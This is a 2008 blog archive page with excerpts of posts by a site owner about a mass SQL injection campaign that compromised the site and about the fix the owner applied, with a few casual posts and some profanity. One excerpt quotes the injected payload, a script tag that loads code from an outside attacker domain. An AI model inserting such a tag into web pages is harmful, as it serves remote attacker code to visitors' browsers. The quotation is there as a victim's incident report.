From the monthly archives:

June 2008

Teh McLovin

by rumblepup on June 16, 2008

Get your own Mclovin ID

{ 0 comments }

When the truth must be told.

by rumblepup on June 11, 2008

Yeah, look up in the left hand corner.

{ 0 comments }

F-OFF mr sql injection hacker

by rumblepup on June 9, 2008

Well, after we implemented our fix, mr. sql injecting hacker has been shown the door. Today we were attacked three more times, both in the url and it seems in our open form fields, and as I’m apt to say when I do a beat down, FUACATA.
Bye bye sql injection hacker.

{ 0 comments }

SQL injection attack. Found the code being used.

by rumblepup on June 6, 2008

Ok, the latest state of sql injection attacks has been a nightmare. We got hacked again, but this time, with an insertion at the url level. These are a little easier to track. In the server logs, we found the following code in different formats.

Code was messing up my layout. Check out the [...]

{ 0 comments }

Latest info on SQL injection attack.

by rumblepup on June 5, 2008

I’ve been getting a lot of requests for information about how to patch this attack. I’ve got to back up a minute and tell you that the attack is a pure sql injection attack. Previously, I reported that it was a windows vulnerability, however, upon further investigation, the server logs I looked at were only [...]

{ 3 comments }

The xiaobaishan bomb is now the flyzhu.9966 bomb.

by rumblepup on June 4, 2008

Updated from: The xiaobaishan bomb.
Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one. We were hacked again, this time the script calling:
<script src=http://flyzhu.9966.org/us/Help.asp></script>
Tricky little fucker.
In fact, this hack is pretty well thought out. Like I said on a previous [...]

{ 9 comments }

The xiaobaishan bomb. Thousands of sites hacked.

by rumblepup on June 1, 2008

It’s very rare that I get the inside scoop on a bomb hack, but this time I’m one of the victims. Seems that some kind of sql injection hack has been leveled against thousands of websites. I’m calling it, for lack of a better term, the xiaobaishan bomb.
As I’m checking for [...]

{ 7 comments }